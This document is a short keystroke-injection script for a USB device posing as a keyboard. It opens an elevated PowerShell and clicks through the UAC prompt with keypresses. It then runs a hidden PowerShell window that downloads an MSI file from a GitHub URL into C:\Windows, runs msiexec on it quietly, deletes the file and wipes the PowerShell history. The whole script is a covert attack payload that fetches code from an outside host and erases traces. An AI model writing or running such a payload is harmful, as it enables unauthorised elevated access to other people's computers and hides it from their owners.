DELAY 1000
GUI r
DELAY 1000
REM Start elevated PowerShell
STRING PowerShell Start-Process -Verb runAs PowerShell
ENTER
DELAY 5000
ALT y
ALT t
DELAY 5000
REM Shrink PowerShell window
STRING mode con cols=20 lines=1
ENTER
REM Run payload in hidden PowerShell window
STRING Start-Process -WindowStyle Hidden PowerShell "
REM Payload
STRING cd C:\Windows;
STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/Gyanbu/MalduinoScripts/raw/master/Tvnc.msi','C:\Windows\Tvnc.msi');
STRING msiexec.exe /x Tvnc.msi /quiet /norestart | Out-Null;
STRING Remove-Item Tvnc.msi
STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
ENTER
